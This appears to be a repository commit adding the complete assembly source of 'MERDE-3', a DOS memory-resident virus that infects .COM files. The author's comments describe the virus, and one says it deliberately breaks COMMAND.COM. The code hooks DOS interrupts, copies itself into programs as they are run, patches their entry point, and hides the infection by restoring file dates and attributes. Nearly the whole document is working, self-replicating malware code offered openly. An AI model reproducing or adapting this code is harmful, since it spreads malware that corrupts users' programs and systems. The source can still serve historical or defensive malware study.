Add files via upload

2026-06-16 15:59:24 +00:00 · 2021-01-12 17:49:21 -06:00
parent a2f096eccc
commit 14e07ba726
99 changed files with 44078 additions and 0 deletions
@@ -0,0 +1,405 @@
+;  MERDE-3:   A resident, non-overwriting .Com infector by the loki-nator
+
+;Well, here it is, for what it's worth..  It is really kind of a 
+;piece of crap, but it is just a rough draft..
+;NOTES:
+;  If this gets into Command.Com, it (command) won't work for unknown reasons..
+;  I could have fixed it by just checking to make sure the file it is infecting
+;  isn't command.com, but I decided that this would be it's harmful side effect
+;  and left it...  I will have to fix several things in it, like its memory 
+;  handling, etc... It only infects files when they are loaded for EXECUTION!
+;  it won't infect .com files loaded by debug via AX=4b03, or al=anything
+;  except 00.... Also, it hooks int 71 for its own type of multiplex
+;  interrupt to check if the resident portion is already installed..
+;  I don't know if that will get me in trouble or not.  This is not very well
+;  tested, so it may hand under some circumstances or ill-behaved programs
+;  that mess with the memory (like I did)...  Well, I need to add .exe 
+;  infection, or I will be just a wanna-be virus writer!
+;  At this very moment, I will probably modify it for infection of any function
+;  that gives INT 21 a DS:DX pointer to a com file.
+;  Oh, yeah- If you compile it, you have to run the included Maker.bat file
+;  after you have compiled it (Use Tasm, but I guess anything will work.)
+
+;  Any GOOD virus writers out there will obviously notice how inefficient this
+;  is, so if you do, leave me mail with some pointers....
+
+compare_val	equ	900
+interrupt	equ	21h
+Code_seg	Segment Byte
+	Assume DS:Code_seg, CS:Code_seg
+	ORG 100h
+start:	mov	di,0100h			;di=start
+	mov	si,bx
+	add	si,offset five_bytes-100h
+	mov	cx,5
+	rep	movsb
+	int	71h
+	cmp	ax,9999h
+	jne	okay
+	mov	ax,0100h
+	xor	si,si
+	xor	si,di
+	xor	cx,cx
+	jmp	ax
+okay:	mov	di,bx
+	sub	di,100h
+	xor	ax,ax
+	mov	es,ax
+	mov	ax,es:[interrupt*4]
+	mov	bx,es:[interrupt*4+2]
+	mov	[di+int_21_saveo],ax
+	mov	[di+int_21_saves],bx
+	push	cs
+	pop	es
+	mov	[di+orig_stackp],sp
+	cli
+	mov	sp,di
+	add	sp,offset my_stack
+	sti
+	push	ax
+	push	bx
+	push	cx
+	push	dx
+	push	bp
+	push	ds
+	push	es
+	push	si
+	push	di
+	mov	[di+my_stack_save],sp
+	cli
+	mov	sp,[di+orig_stackp]
+	sti					
+	int	12h
+	mov	bx,cs
+	mov	cx,1024
+	mul	cx	
+	clc
+	mov	cx,400h
+	sub	ax,cx
+	sbb	dx,0000			;dx:ax=where we want this mem to end!
+	mov	[di+high_ram],dx
+	mov	[di+low_ram],ax
+here:	mov	cx,cs
+	mov	ax,0010h
+	mul	cx
+	clc
+	mov	cx,di
+	add	cx,offset ending
+	add	ax,cx
+	adc	dx,0000
+	clc
+	sub	[di+low_ram],ax
+	sbb	[di+high_ram],dx
+	clc
+	mov	ax,[di+low_ram]
+	mov	dx,[di+high_ram]
+	mov	cx,0010h
+	div	cx		;dx:ax=memory above this-divide it by 16
+	mov	bx,ax
+	mov	ah,4ah
+	int	21h
+	jnc	okay_1
+	jmp	get_out
+okay_1:	mov	ah,48h
+	mov	bx,60h
+	int	21h
+	mov	[my_segment+di],ax
+	jnc	okay_2
+	jmp	get_out
+okay_2:	push	di
+	xor	di,di
+	xor	si,si
+	mov	es,ax
+	mov	cx,100h
+	rep	movsb
+	pop	si
+	push	si
+	add	si,100h
+	mov	cx,offset ending-100h
+	rep	movsb
+	pop	di
+	mov	dx,es
+	sub	dx,1
+	mov	es,dx
+	mov	es:[1],ax
+	mov	byte ptr es:[0],'Z'
+	mov	word ptr es:[3],0000
+	mov	es,ax
+	mov	es:[16h],ds
+	mov	ax,offset return_to_file
+	add	ax,di
+	mov	es:[0ah],ax
+	mov	es:[0ch],ds
+	mov	ah,50h
+	mov	bx,es
+	int	21h
+	mov	dx,600h
+	mov	ax,es
+	mov	ds,ax
+	mov	es,ax
+	push	cs
+	pop	ss
+	mov	word ptr cs:[return_to_file+di+1],di
+	mov	sp,600h
+	int	27h
+return_to_file:
+	mov	di,0000
+	xor	ax,ax
+	mov	es,ax
+	mov	bx,offset my_21
+	mov	ax,cs:[di+my_segment]
+	mov	word ptr es:[interrupt*4],bx
+	mov	word ptr es:[interrupt*4+2],ax
+	mov	word ptr es:[71h*4+2],ax
+	mov	bx,offset my_71	
+	mov	word ptr es:[71h*4],bx
+	mov	ax,cs
+	cli
+	mov	ss,ax
+	mov	sp,cs:[my_stack_save+di]
+	sti
+	pop	di
+	pop	si
+	pop	es
+	pop	ds
+	pop	bp
+	pop	dx
+	pop	cx
+	pop	bx
+	pop	ax
+	cli
+	mov	sp,cs:[di+orig_stackp]
+	sti
+	mov	ax,0100h
+	jmp	ax
+get_out:
+	mov	ax,cs
+	cli
+	mov	ss,ax
+	mov	sp,cs:[di+my_stack_save]
+	sti
+	pop	di
+	pop	si
+	pop	es
+	pop	ds
+	pop	bp
+	pop	dx
+	pop	cx
+	pop	bx
+	pop	ax
+	cli
+	mov	sp,cs:[di+orig_stackp]
+	sti
+	mov	ax,0100h
+	jmp	ax	
+
+
+;------------------------------------------------------------------
+
+my_21:	
+	cmp	ah,4bh
+	je	continue_with_it
+	jmp	continue_21
+continue_with_it:
+	cmp	al,00
+	je	okay_go
+	jmp	continue_21
+okay_go:
+	push	ax
+	push	bx
+	push	cx
+	push	dx
+	push	es
+	push	di
+	push	si
+	push	bp
+	push	es
+	push	ds
+check_file:
+	mov	bx,dx
+	xor	si,si
+looper:	
+	cmp	byte ptr ds:[bx+si],'.'
+	je	check_com
+	cmp	si,35
+	jle	okay5
+	jmp	give_up1
+okay5:	inc	si
+	jmp	looper
+check_com:
+	inc	si
+	cmp	byte ptr ds:[bx+si],'c'
+	je	check_for_infection
+	cmp	byte ptr ds:[bx+si],'C'
+	je	check_for_infection
+	jmp	give_up1
+check_for_infection:
+	mov	cs:[high_file],ds
+	mov	cs:[low_file],dx
+	mov	ah,50h		;set PSP to ours
+	push	cs
+	pop	bx
+	call	dos_21
+	mov	ah,43h
+	xor	al,al
+	call	dos_21
+	jnc	okay9
+	jmp	give_up
+okay9:	mov	cs:[attrib],cx
+	mov	ah,43h
+	mov	al,1
+	xor	cx,cx
+	call	dos_21
+	mov	ah,3dh
+	mov	al,2
+	call	dos_21
+	jnc	okay10
+	jmp	give_up
+okay10:	mov	cs:[handle],ax
+	mov	bx,ax
+	mov	ah,57h
+	xor	al,al
+	call	dos_21
+	mov	cs:[date],dx
+	mov	cs:[time],cx
+	mov	al,2
+	mov	ah,42h
+	xor	dx,dx
+	xor	cx,cx
+	call	dos_21
+	jnc	okay11
+	jmp	give_up
+okay11:	cmp	dx,0
+	je	okay12
+	jmp	give_up
+okay12:	mov	cs:[file_size],ax
+	cmp	ax,64000
+	jb	contin1
+	call	reset_all
+	jmp	give_up
+contin1:
+	cmp	ax,1024
+	jnb	contin2
+	call	reset_all
+	jmp	give_up
+contin2:
+	sub	ax,compare_val
+	mov	dx,ax
+	xor	cx,cx
+	mov	ah,42h
+	xor	al,al
+	mov	bx,cs:[handle]
+	call	dos_21
+	mov	ah,3fh
+	push	cs
+	pop	ds
+	mov	dx,offset buffer
+	mov	cx,2
+	call	dos_21
+	mov	ax,word ptr cs:[buffer]
+	mov	bx,word ptr cs:[offset ending-compare_val]
+	cmp	ax,bx
+	jne	infect_it
+	call	reset_all
+	jmp	give_up
+infect_it:
+	xor	cx,cx
+	xor	dx,dx
+	mov	bx,cs:[handle]
+	mov	ax,4200h
+	call	dos_21
+	mov	ah,3fh
+	mov	cx,5
+	push	cs
+	pop	ds
+	mov	dx,offset five_bytes
+	call	dos_21
+	mov	ax,4202h
+	xor	cx,cx
+	xor	dx,dx
+	call	dos_21
+	mov	ax,cs:[file_size]
+	add	ax,100h
+	mov	word ptr cs:[jumper+1],ax
+	mov	ah,40h
+	mov	cx,offset ending-100h
+	mov	dx,0100h
+	call	dos_21
+	xor	cx,cx
+	xor	dx,dx
+	mov	ax,4200h
+	mov	bx,cs:[handle]
+	call	dos_21
+	mov	dx,offset jumper
+	mov	ah,40h
+	mov	cx,5
+	call	dos_21
+	call	reset_all		
+give_up:
+	mov	ah,50h
+	mov	bx,cs:[high_file]
+	call	dos_21
+give_up1:
+	pop	ds
+	pop	es
+	pop	bp
+	pop	si
+	pop	di
+	pop	es
+	pop	dx
+	pop	cx
+	pop	bx
+	pop	ax
+	jmp	continue_21
+continue_21:
+	jmp	dword ptr cs:[int_21_saveo]
+dos_21:
+	pushf
+	call	dword ptr cs:[int_21_saveo]
+	ret
+
+reset_all:
+	mov	bx,cs:[handle]
+	mov	cx,cs:[time]
+	mov	dx,cs:[date]
+	mov	ax,5701h
+	call	dos_21
+	mov	ah,3eh
+	mov	bx,cs:[handle]
+	call	dos_21
+	mov	ah,43h
+	mov	al,1
+	mov	cx,cs:[attrib]
+	mov	ds,cs:[high_file]
+	mov	dx,cs:[low_file]
+	call	dos_21
+	ret	
+my_71:
+	mov	ax,9999h
+	iret
+dw	44 dup(00)
+my_stack:
+jumper:		mov	bx,0000
+		jmp	bx
+file_size	dw	0000
+high_file	dw	0000
+low_file	dw	0000
+handle		dw	0000
+attrib		dw	0000
+date		dw	0000
+time		dw	0000
+int_21_saveo	dw	0000
+int_21_saves	dw	0000
+orig_stackp	dw	0000
+my_stack_save	dw	0000
+high_ram	dw	0000
+low_ram		dw	0000
+my_segment	dw	0000
+buffer:		db	10 dup(00)
+five_bytes:	db	0cdh,20h,90h,90h,90h
+my_little_message_to_the_world:
+
+	db	'Scan me, I LIKE IT!!!!-Loki-nator!'
+ending:
+Code_seg 	ENDS
+END	start